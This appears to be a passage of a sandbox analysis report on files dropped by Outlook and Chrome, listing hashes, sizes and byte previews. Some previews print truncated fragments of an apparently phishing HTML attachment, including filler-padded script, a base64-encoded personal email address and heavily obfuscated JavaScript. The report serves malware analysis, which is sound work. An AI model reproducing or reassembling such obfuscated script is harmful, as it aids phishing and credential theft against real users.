              SHA1:922130CA3A7F04646E2A0ED9805A46F47222463C
              SHA-256:0DAB874F13D3A31690D15B66B6BDADE96CB9AE568C0F2AEF48590EE297214568
              SHA-512:87D0B982C695ACC0EBBAF7B79EE76E0524589CFDEC8906EAD64C715F5F4BC24D9BB54EA67EEFAC3924C2507883C42DAC032F4E4F82557500F2B8DDDDA60BAA4C
              Malicious:false
              Reputation:unknown
              Preview:.... .c.....%h......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):32768
              Entropy (8bit):0.04486648292292196
              Encrypted:false
              SSDEEP:
              MD5:F61FEB3D2F44ED4A147E5193CE8A342D
              SHA1:AE8B3F6D688D6ECAC05BFE35969CEA68AE49310D
              SHA-256:7E02471988D99FC083054E8485371EE589C51F16C17268A05FDCD896CF470409
              SHA-512:1D7C391AECD61BB4D9A9D976E7B8C45F961436109F23CA818891761CCE6A33FB92DE6A1BD842083E35F720893918C37E7EBAC174DA6BF99998162113A0BB51CC
              Malicious:false
              Reputation:unknown
              Preview:..-......................3...Lv..Q...`4a.........-......................3...Lv..Q...`4a...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:SQLite Write-Ahead Log, version 3007000
              Category:dropped
              Size (bytes):45352
              Entropy (8bit):0.3954210488314096
              Encrypted:false
              SSDEEP:
              MD5:806A9A7D2C5DBAED7C507E2FC8385F2C
              SHA1:BD8A22AB4FA616660908D426CDEC21825764E147
              SHA-256:4FE6C6C42A05D3BFF5C59DFD3DB550130D4709CCA220C79BF6376F7AA150600E
              SHA-512:95EF72AC4018C141C2D46E6448FBA0F1BDADBB329764566B8CDCD52309A1A76216F8B98065377242F4714335E53E0FDA0A7ED8584DBF50C248C26B8F91CD5D1E
              Malicious:false
              Reputation:unknown
              Preview:7....-...........Q...`4..T..*...........Q...`4._u...OSQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:HTML document, ASCII text, with very long lines (64099), with CRLF line terminators
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:1BBC4F6D6474FE87C8589C39DB92DE09
              SHA1:595E9AC037D8DEE60D47225CED8535C352C3681B
              SHA-256:EA0D694C1555651B233A89BECBDD389F559BAACF6C71D9AA0FACE21B264AD7CD
              SHA-512:6B9A9CEE51404C7B385B1116344C53F002CAB6EDE297220BBCAB318604699AE5CE42BA96ACCDB60EEE9C24CC94B202BD1D0FFE9204A4DD9D21A121C65F071DF5
              Malicious:false
              Reputation:unknown
              Preview: <span>Anim bresaola do, beef ham pork belly tempor pariatur nisi aliqua dolor ut aliquip dolore. Ut officia aliquip ut. Dolore nostrud cupim ut occaecat chuck. In ea ullamco beef ribs, t-bone incididunt kielbasa andouille bresaola pork belly enim ut. Ullamco in chislic, sint et in landjaeger mollit adipisicing t-bone magna ribeye sirloin. In turkey sed cillum adipisicing. Andouille est meatball ribeye, shoulder eiusmod eu drumstick pork belly incididunt ut veniam. Alcatra ground round leberkas meatball, pork belly ea short ribs. Nisi turducken short ribs rump chicken. Spare ribs ipsum pork chop, est ut porchetta commodo fatback burgdoggen biltong ea.</span> -->..<script>..let rh13z8jemt = 'cmljY2FyZG8ubm9iaWxlQGJlYW50ZWNoLml0';// Nostrud pastrami ad, leberkas beef frankfurter biltong spare ribs strip steak swine chuck ut ea ipsum. Sunt culpa enim, meatball salami fatback leberkas ham meatloaf labore drumstick consectetur laboris hamburger ipsum. Kevin esse deserunt do elit tenderl
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:HTML document, ASCII text, with very long lines (64099), with CRLF line terminators
              Category:dropped
              Size (bytes):366519
              Entropy (8bit):3.8716428305128274
              Encrypted:false
              SSDEEP:
              MD5:1BBC4F6D6474FE87C8589C39DB92DE09
              SHA1:595E9AC037D8DEE60D47225CED8535C352C3681B
              SHA-256:EA0D694C1555651B233A89BECBDD389F559BAACF6C71D9AA0FACE21B264AD7CD
              SHA-512:6B9A9CEE51404C7B385B1116344C53F002CAB6EDE297220BBCAB318604699AE5CE42BA96ACCDB60EEE9C24CC94B202BD1D0FFE9204A4DD9D21A121C65F071DF5
              Malicious:false
              Reputation:unknown
              Preview: <span>Anim bresaola do, beef ham pork belly tempor pariatur nisi aliqua dolor ut aliquip dolore. Ut officia aliquip ut. Dolore nostrud cupim ut occaecat chuck. In ea ullamco beef ribs, t-bone incididunt kielbasa andouille bresaola pork belly enim ut. Ullamco in chislic, sint et in landjaeger mollit adipisicing t-bone magna ribeye sirloin. In turkey sed cillum adipisicing. Andouille est meatball ribeye, shoulder eiusmod eu drumstick pork belly incididunt ut veniam. Alcatra ground round leberkas meatball, pork belly ea short ribs. Nisi turducken short ribs rump chicken. Spare ribs ipsum pork chop, est ut porchetta commodo fatback burgdoggen biltong ea.</span> -->..<script>..let rh13z8jemt = 'cmljY2FyZG8ubm9iaWxlQGJlYW50ZWNoLml0';// Nostrud pastrami ad, leberkas beef frankfurter biltong spare ribs strip steak swine chuck ut ea ipsum. Sunt culpa enim, meatball salami fatback leberkas ham meatloaf labore drumstick consectetur laboris hamburger ipsum. Kevin esse deserunt do elit tenderl
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:
              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
              Malicious:false
              Reputation:unknown
              Preview:[ZoneTransfer]..ZoneId=3..
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:CDFV2 Microsoft Outlook Message
              Category:dropped
              Size (bytes):444928
              Entropy (8bit):4.407364562632454
              Encrypted:false
              SSDEEP:
              MD5:F39181FD430DEBFA6DB8B8BA6A61C92E
              SHA1:B0E29CDED862E0AFE78CB59BF928798A092F2B39
              SHA-256:23728FF2A41A6B0B1759FA7852BCD805F1CAFA3B2A9B7A5A911D91248514B49C
              SHA-512:0A456076F704591B4BB86D7B041199D34E5992F62C9E135B6B00264005B01D4BFCAFDD93564C8FB8768E9D295C3F79D6871D3999326CD4B035DB1781090B54D7
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................^..........@......._._.p.r.o.p.e.r.t.i.e.s._.v.e.r.s.i.o.n.1...0...................0..............................................................._._.n.a.m.e.i.d._.v.e.r.s.i.o.n.1...0...........................(...........,................................^.................._._.s.u.b.s.t.g.1...0._.0.E.0.4.0.0.1.F.........................*.......................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with very long lines (28727), with CRLF line terminators
              Category:dropped
              Size (bytes):20971520
              Entropy (8bit):0.16131094430806117
              Encrypted:false
              SSDEEP:
              MD5:A690719F8F31A1BF13B4A322A6A49B7D
              SHA1:0B1201448C3ED89333457C903E9D05BBFBDC877F
              SHA-256:8D6C3B77468E6A544EC4AD15592D813698CA99D1726300C16945A8F11C160EC2
              SHA-512:B1F765C8CE101D53BF0201622B07B153592EA97D71CB6896486D9234A22CDB6377B42122B8216C346B3E91EF120E2886670DD680E12D1F7BBDC4618273BD7A2D
              Malicious:false
              Reputation:unknown
              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/10/2024 07:28:52.685.OUTLOOK (0x1420).0xE98.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":21,"Time":"2024-10-10T07:28:52.685Z","Contract":"Office.System.Activity","Activity.CV":"z0u6bpGmMEOY97hkVhvRdg.4.9","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/10/2024 07:28:52.701.OUTLOOK (0x1420).0xE98.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":23,"Time":"2024-10-10T07:28:52.701Z","Contract":"Office.System.Activity","Activity.CV":"z0u6bpGmMEOY97hkVhvRdg.4.10","Activity.Duration":11772,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVer
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):20971520
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:modified
              Size (bytes):106496
              Entropy (8bit):4.532409908573557
              Encrypted:false
              SSDEEP:
              MD5:6B8E70EA7325C95D4C8BDDF6A71E1683
              SHA1:2F6B96C02832D772D15140523711594454508872
              SHA-256:B6D37AE4FEF9D8C2631F0BD3D835A4EFAA69C6E1CF213D6442D83D0CA1660D18
              SHA-512:39C38426E24EFFF6EED3D84DDA3559724A127B14418BEC67826732DFD238C41538515EF98C26C42E719D0E7A0C897241B65616C869605C5EF6100C0C4E6F65F3
              Malicious:false
              Reputation:unknown
              Preview:............................................................................`....... .....i.....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................p/..Y............i.............v.2._.O.U.T.L.O.O.K.:.1.4.2.0.:.5.c.6.0.5.b.3.0.6.1.2.2.4.1.b.5.b.b.0.0.0.6.9.e.3.2.7.d.b.3.0.4...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.1.0.T.0.3.2.8.5.2.0.4.1.6.-.5.1.5.2...e.t.l.......P.P..... ...K"l.............................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):401160
              Entropy (8bit):5.0969337234259475
              Encrypted:false
              SSDEEP:
              MD5:6809BA3651266F40B1AF131747303287
              SHA1:83E1BDAF42FB231C88145990238DAB39C9072014
              SHA-256:9003F9E4D3E0CA4942B9388ECABD1CF1AAD9F02034EB09751BE50E05ACD93CF6
              SHA-512:83B829203170077ADF67B717C63281C1E071ABDB70CB73D3F8946018A2B472EB35536A7B8DE87FFD404CFBD7C99FADC5330B3708354682C5CDAB81AEEEDD6663
              Malicious:false
              Reputation:unknown
              Preview:JScrJzUnKyc3JysnIicrJyknKSgpK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytk..KyQrc3MrYStzYSsoMjUpW3NdKDMwKSskKycoJysnIicrJyUnKyc1JysnNScrJyInKycpJykoKSso..KFtdK1tdKVt0XStbXSlbMTRdK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytkKyQrc3MrYStz..YSsoMjUpW3NdKDMwKSskKycoJysnIicrJyUnKyc1JysnMCcrJyInKycpJykoKSsoKFtdK1tdKVt0..XStbXSlbOV0rKCghW10pW3RdK1tdKVs5XStfK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytk..KyQrc3MrYStzYSsoMjUpW3NdKDMwKSskKycoJysnIicrJyUnKyc1JysnOScrJyInKycpJykoKStb..XVtlXVt0XSh5KyQrc2crXyt5K2QrJyAnK18rZCskK3NzK2Erc2ErKDI1KVtzXSgzMCkrJCsnKCcr..JyInKyclJysnNScrJzcnKyciJysnKScpKCkrJzEnK2crW11bZV1bdF0oeSskK3NnK18reStkKycg..JytfK2QrJCtzcythK3NhKygyNSlbc10oMzApKyQrJygnKyciJysnJScrJzQnK2ErJyInKycpJyko..KStkK1tdW2VdW3RdKHkrJCtzZytfK3krZCsnICcrXytkKyQrc3MrYStzYSsoMjUpW3NdKDMwKSsk..KycoJysnIicrJyUnKyc0JytzYSsnIicrJyknKSgpK2crYStbXVtlXVt0XSh5KyQrc2crXyt5K2Qr..JyAnK18rZCskK3NzK2Erc2ErKDI1KVtzXSgzMCkrJCsnKCcrJyInKyclJysnNCcrJzcnKyciJysn..KScpKCkrKDMzKVtzXSgzNCkrKDE3KVtzXSgyMCkrW11bZV1bdF0oeSskK3NnK18reStkKycg
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):235447
              Entropy (8bit):3.85868895765524
              Encrypted:false
              SSDEEP:
              MD5:166C7C3FFB0D9AE1B2A51B545182024E
              SHA1:2E70DD44902AC09F2AB7DFD9D16508AA9D2A18EB
              SHA-256:D8AD92EDA7891D368F9968EEDEEC90E5B030E6672276FF763AF745D9B8DF7450
              SHA-512:4F56DF4EC54103F02DCCFFD28202CFD23D940F9B743A68471FEDE1A12E001B183E70FA700601E360FEDA36664A132ADC5E420B657D9F2D40F4B3DC612B4FB1F2
              Malicious:false
              Reputation:unknown
              Preview:$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'1'+'"'+')')()+(([]+[])[t]+[])[14]+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'9'+'"'+')')()+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'7'+'"'+')')()+'5'+(20)[s](21)+si+'3'+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'6'+'"'+')')()+(25)[s](30)+si+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+'7'+'"'+')')()+(33)[s](34)+g+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+a+'"'+')')()+sn+((![])[t]+[])[9]+sd+st+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'7'+'"'+')')()+(33)[s](34)+ss+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'5'+'9'+'"'+')')()+(([]+[])[t]+[])[9]+((![])[t]+[])[9]+(32)[s](33)+si+'3'+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+sa+'"'+')')()+s$+sa+[][e][t](y+$+sg+_+y+d+' '+_+d+$+ss+a+sa+(25)[s](30)+$+'('+'"'+'%'+'4'+'7'+'"'+')')()+[][e][t](
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Reputation:unknown
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):606208
              Entropy (8bit):3.7538263360901607
              Encrypted:false
              SSDEEP:
              MD5:C7D7C7C8B38C958FD7B88A7272BB6404
              SHA1:7948999BC376C836D1783848C7598D98DB55E086
              SHA-256:33F8263A6D4B1AFC5092E0053053C98A6BB57251EE488C9B48E1A3F2A3649062
              SHA-512:7F8E656310ECAD1AFFA132BBC6C26BD20B019E0D72E3A315C759981204D4AF8EE47A8C15DC73703E8ADE5E55F50D0E59C73F01FD50D868033DE27D9ED43EF244
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:CDFV2 Microsoft Outlook Message
              Category:dropped
              Size (bytes):458752
              Entropy (8bit):4.3715704496489565
              Encrypted:false
              SSDEEP:
              MD5:8C1C39B66C7DDB95DF7FC4464D02631D
              SHA1:01E378A93D344983E4DBDB3CBF25054177EC1C9E
              SHA-256:4F833E18CD4F2DCD9EFA6D4155321F9B4F9889770073322BF338A5A11EE7BC5B
              SHA-512:DF8685ED8D50CD6D6448B4B34E93CCE0AE05F10A8AE78F840D1F828E4B460EFA8C71751D65C92AD497F61E838AF72BEFF1FEE67B1BF215150B19388B5AF306F9
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................^..........@......._._.p.r.o.p.e.r.t.i.e.s._.v.e.r.s.i.o.n.1...0...................0..............................................................._._.n.a.m.e.i.d._.v.e.r.s.i.o.n.1...0...........................(...........,................................^.................._._.s.u.b.s.t.g.1...0._.0.E.0.4.0.0.1.F.........................*.......................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:modified
              Size (bytes):30
              Entropy (8bit):1.2389205950315936
              Encrypted:false
              SSDEEP:
              MD5:E58F1317756DA0FDC1DF836F59BCE5ED
              SHA1:6003B2D80F7AE7CA187B21F7362457774C53A3E7
              SHA-256:4B1326015149FD1E48ED64281054BEFD89259C411DD0695ED6D035B320E2BD05
              SHA-512:FB16BF7EF7C38C9BDBEAB423C3A376D6075853AC2798B45EED16BD14A65612171A11D164A33317F41CC4EF3B6211BE8C85BECA7610B951957E14C16285AE84E3
              Malicious:false
              Reputation:unknown
              Preview:..............................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):16384
              Entropy (8bit):0.6689880738799913
              Encrypted:false
              SSDEEP:
              MD5:FA0C42CAAEA98B5491EB769E055D27D4
              SHA1:F1DEB7ADC1D5FED51E454E0C312B056B55A04850
              SHA-256:4C334C5F52838A0F78F2C45602EFA3B4FAC62DD7D400A1A44DAE5E9B2D3A45FA
              SHA-512:4571460D757EB55807BED2102451A4C53D7C297C308125810B64099B20F2BB4FB5568F9F59DB5556696A71DF9521DC9CE7853A404EB6016F1EC4C0E10F3C7ED8
              Malicious:false
              Reputation:unknown
              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2673
              Entropy (8bit):3.9845052455742715
              Encrypted:false
              SSDEEP:
              MD5:ADE76CC9B1C72456E2EE7B147C270F2C
              SHA1:432153BDD4D0FC6C9DA292A2B9B7750114FF6042
              SHA-256:4E3B8C57C094CBDE6A38DB0A2C22ED9CCD77FDFF8386771936731E70B0DB4C38
              SHA-512:CBE2F851A18140CE2A6EB43337EF9B6E68B0B270E466CC5D6FFEED7E6DE3EB50D9EA5C7F1C39E2587945D72860723925A002BF7CFA3B540BA59E75D530ED2132
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....m......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2675
              Entropy (8bit):3.9991657139099104
              Encrypted:false
              SSDEEP:
              MD5:05982F42512618DA0843987D58CD576A
              SHA1:220A3E5A5BCAEBC1F88CB460357DFCEA0EE894D0
              SHA-256:0E333FAF75BEEFAD7495E8F3CE3047A2308D41F6A7EE21B039E17F1E517DF759
              SHA-512:A1BA36A2953FFAA23AEC9F444281FD3CAFC5A487AAD6D18E8CDF13EE6038955CABBB8DF40F75AD779470B237E7F37E5181D141E62A913E8C1419831987CB0C36
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....^c......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2689
              Entropy (8bit):4.00613585977403
              Encrypted:false
              SSDEEP:
              MD5:0B578EEED3FC4447A9F54E21810D6C43
              SHA1:EB95C99DE939DAC67BDCDE96DF71E5323DD84CC8
              SHA-256:9137974091B1DF1B24840D7C6CA07BBE3CABA07097FE2A0E9B1D15AACB204EF8
              SHA-512:FEBED5A48C88DE239E054ADB0E7C14329F2BBD8C6F03DCD23B2A7BE51B5E6D042073810F6A1D5F0C18F28EBE72158D8BCC8350C87BDB3ACC8180DC891F35113D
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.9995546900910623
              Encrypted:false
              SSDEEP:
              MD5:349A280E2D47DD725808047D4E34285F
              SHA1:05DBCDA785A0BD53AD9FA62D984923AADBA8F9BD
              SHA-256:31A3F7BDF5F7CA95487A33E49485C949379CA0B2A8CAF4B0AE891C82E45EB281
              SHA-512:0493817990BF7B9BC76EC7C0D4CA93AE933A9D1475465012145CE6F88C2B83B1DBFAF1DD37EEADE282416B98745F1A8E93549A59C7FECFFD8AF2376BFE3F753C
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IJYw;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJY.;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VJY.;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VJY.;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VJY.;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........5........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 10 06:29:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.9870569302285204
              Encrypted:false
              SSDEEP:
